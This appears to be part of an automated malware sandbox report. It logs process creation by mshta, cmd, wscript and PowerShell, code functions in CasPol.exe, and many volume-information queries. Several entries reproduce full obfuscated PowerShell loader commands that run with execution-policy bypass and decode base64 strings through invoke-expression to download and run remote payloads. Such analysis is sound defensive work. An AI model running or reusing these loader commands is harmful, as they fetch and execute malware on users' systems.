icagicagicagicagic1uqu1lc1bby2ugicagicagicagicagicagicagicagicagicagicagicagywjms1nzu0feicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjdzamhdny2dit1g1ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljixmc4xntaumjqvntuvy3jlyw15a2lzc2luz2xpchnnb29kzm9yy3jlyw15dghpbmdzd2l0agnyzwftawnyzwftlnrjriisiirltly6qvbqrefuqvxjcmvhbxlraxnzaw5nbglwc2dvb2rmb3jjcmvhbxl0agluz3n3axroy3jlyw0udmjtiiwwldapo1n0yvj0lvnmzwvqkdmpo0ludm9rrs1fwhbsrvntaw9uicagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcy3jlyw15a2lzc2luz2xpchnnb29kzm9yy3jlyw15dghpbmdzd2l0agnyzwftlnziuyi='+[char]34+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jdzamhdny2dit1g1icagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqurelvrzcgugicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfcmrfrmlosvrpb04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvyte1vti5ebgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagig9xaxbuewzfvyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagqkdsvvvfc0ksc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagifmsdwludcagicagicagicagicagicagicagicagicagicagicagicbpdfrvehr6cyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicague1sktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicagicjpykyiicagicagicagicagicagicagicagicagicagicagicagic1uqu1lc1bby2ugicagicagicagicagicagicagicagicagicagicagicagywjms1nzu0feicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjdzamhdny2dit1g1ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljixmc4xntaumjqvntuvy3jlyw15a2lzc2luz2xpchnnb29kzm9yy3jlyw15dghpbmdzd2l0agnyzwftawnyzwftlnrjriisiirltly6qvbqrefuqvxjcmvhbxlraxnzaw5nbglwc2dvb2rmb3jjcmvhbxl0agluz3n3axroy3jlyw0udmjtiiwwldapo1n0yvj0lvnmzwvqkdmpo0ludm9rrs1fwhbsrvntaw9uicagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcy3jlyw15a2lzc2luz2xpchnnb29kzm9yy3jlyw15dghpbmdzd2l0agnyzwftlnziuyi='+[char]34+'))')))"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $isohemolytic = 'jgnhc2vtyxrlzca9icdodhrwczovl3jlcy5jbg91zgluyxj5lmnvbs9kexrmbhq2mw4vaw1hz2uvdxbsb2fkl3yxnzmzmtm0otq3l2jrbhb5c2v5zxv0ngltchc1mg4xlmpwzyanoyrsywrub3igpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrozw1pywjszxbzawegpsakumfkbm9ylkrvd25sb2fkrgf0ysgky2fzzw1hdgvkktskymlkzxmgpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkagvtawfibgvwc2lhktska2lkzgllcya9icc8pejbu0u2nf9tvefsvd4+jzskyxzlbnrhawxlid0gjzw8qkftrty0x0vord4+jzskc3rhaw4gpsakymlkzxmusw5kzxhpzigka2lkzgllcyk7jhjlc2h1zmzszsa9icriawrlcy5jbmrlee9mkcrhdmvudgfpbgupoyrzdgfpbiatz2ugmcatyw5kicryzxnodwzmbguglwd0icrzdgfpbjskc3rhaw4gkz0gjgtpzgrpzxmutgvuz3rooyrzdwjhy3v0zwx5id0gjhjlc2h1zmzszsaticrzdgfpbjskyxj0ahjhbgdpysa9icriawrlcy5tdwjzdhjpbmcojhn0ywlulcakc3viywn1dgvsesk7jhvuywrzb3jizwqgpsatam9pbiaojgfydghyywxnaweuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojgfydghyywxnaweutgvuz3rokv07jg1pbnrsawtlid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkdw5hzhnvcmjlzck7jg1pbgxpbmvyid0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzcgkbwludgxpa2upoyrwcm9kawdhbca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrwcm9kawdhbc5jbnzva2uojg51bgwsieaojzavqxpmog8vci9lzs5ldhnhcc8vonnwdhrojywgjyrozxrlcm9icmfuy2hpyscsicckagv0zxjvynjhbmnoawenlcanjghldgvyb2jyyw5jaglhjywgj0nhc1bvbccsicckagv0zxjvynjhbmnoawenlcanjghldgvyb2jyyw5jaglhjywnjghldgvyb2jyyw5jaglhjywnjghldgvyb2jyyw5jaglhjywnjghldgvyb2jyyw5jaglhjywnjghldgvyb2jyyw5jaglhjywnjghldgvyb2jyyw5jaglhjywnmscsjyrozxrlcm9icmfuy2hpyscpkts=';$choleate = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($isohemolytic));invoke-expression $choleate
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jdzamhdny2dit1g1icagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqurelvrzcgugicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfcmrfrmlosvrpb04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvyte1vti5ebgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagig9xaxbuewzfvyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagqkdsvvvfc0ksc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagifmsdwludcagicagicagicagicagicagicagicagicagicagicagicbpdfrvehr6cyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicague1sktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicagicjpykyiicagicagicagicagicagicagicagicagicagicagicagic1uqu1lc1bby2ugicagicagicagicagicagicagicagicagicagicagicagywjms1nzu0feicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjdzamhdny2dit1g1ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljixmc4xntaumjqvntuvy3jlyw15a2lzc2luz2xpchnnb29kzm9yy3jlyw15dghpbmdzd2l0agnyzwftawnyzwftlnrjriisiirltly6qvbqrefuqvxjcmvhbxlraxnzaw5nbglwc2dvb2rmb3jjcmvhbxl0agluz3n3axroy3jlyw0udmjtiiwwldapo1n0yvj0lvnmzwvqkdmpo0ludm9rrs1fwhbsrvntaw9uicagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcy3jlyw15a2lzc2luz2xpchnnb29kzm9yy3jlyw15dghpbmdzd2l0agnyzwftlnziuyi='+[char]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jdzamhdny2dit1g1icagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqurelvrzcgugicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfcmrfrmlosvrpb04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvyte1vti5ebgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagig9xaxbuewzfvyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagqkdsvvvfc0ksc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagifmsdwludcagicagicagicagicagicagicagicagicagicagicagicbpdfrvehr6cyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicague1sktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicagicjpykyiicagicagicagicagicagicagicagicagicagicagicagic1uqu1lc1bby2ugicagicagicagicagicagicagicagicagicagicagicagywjms1nzu0feicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjdzamhdny2dit1g1ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljixmc4xntaumjqvntuvy3jlyw15a2lzc2luz2xpchnnb29kzm9yy3jlyw15dghpbmdzd2l0agnyzwftawnyzwftlnrjriisiirltly6qvbqrefuqvxjcmvhbxlraxnzaw5nbglwc2dvb2rmb3jjcmvhbxl0agluz3n3axroy3jlyw0udmjtiiwwldapo1n0yvj0lvnmzwvqkdmpo0ludm9rrs1fwhbsrvntaw9uicagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcy3jlyw15a2lzc2luz2xpchnnb29kzm9yy3jlyw15dghpbmdzd2l0agnyzwftlnziuyi='+[char]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $isohemolytic = 'jgnhc2vtyxrlzca9icdodhrwczovl3jlcy5jbg91zgluyxj5lmnvbs9kexrmbhq2mw4vaw1hz2uvdxbsb2fkl3yxnzmzmtm0otq3l2jrbhb5c2v5zxv0ngltchc1mg4xlmpwzyanoyrsywrub3igpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrozw1pywjszxbzawegpsakumfkbm9ylkrvd25sb2fkrgf0ysgky2fzzw1hdgvkktskymlkzxmgpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkagvtawfibgvwc2lhktska2lkzgllcya9icc8pejbu0u2nf9tvefsvd4+jzskyxzlbnrhawxlid0gjzw8qkftrty0x0vord4+jzskc3rhaw4gpsakymlkzxmusw5kzxhpzigka2lkzgllcyk7jhjlc2h1zmzszsa9icriawrlcy5jbmrlee9mkcrhdmvudgfpbgupoyrzdgfpbiatz2ugmcatyw5kicryzxnodwzmbguglwd0icrzdgfpbjskc3rhaw4gkz0gjgtpzgrpzxmutgvuz3rooyrzdwjhy3v0zwx5id0gjhjlc2h1zmzszsaticrzdgfpbjskyxj0ahjhbgdpysa9icriawrlcy5tdwjzdhjpbmcojhn0ywlulcakc3viywn1dgvsesk7jhvuywrzb3jizwqgpsatam9pbiaojgfydghyywxnaweuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojgfydghyywxnaweutgvuz3rokv07jg1pbnrsawtlid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkdw5hzhnvcmjlzck7jg1pbgxpbmvyid0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzcgkbwludgxpa2upoyrwcm9kawdhbca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrwcm9kawdhbc5jbnzva2uojg51bgwsieaojzavqxpmog8vci9lzs5ldhnhcc8vonnwdhrojywgjyrozxrlcm9icmfuy2hpyscsicckagv0zxjvynjhbmnoawenlcanjghldgvyb2jyyw5jaglhjywgj0nhc1bvbccsicckagv0zxjvynjhbmnoawenlcanjghldgvyb2jyyw5jaglhjywnjghldgvyb2jyyw5jaglhjywnjghldgvyb2jyyw5jaglhjywnjghldgvyb2jyyw5jaglhjywnjghldgvyb2jyyw5jaglhjywnjghldgvyb2jyyw5jaglhjywnmscsjyrozxrlcm9icmfuy2hpyscpkts=';$choleate = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($isohemolytic));invoke-expression $choleateJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433E1A cpuid 12_2_00433E1A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,12_2_004510CA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_004470BE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_004511F3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,12_2_004512FA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_004513C7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,12_2_004475A7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoA,12_2_0040E679
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,12_2_00450A8F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_00450D52
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_00450D07
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_00450DED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_00450E7A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
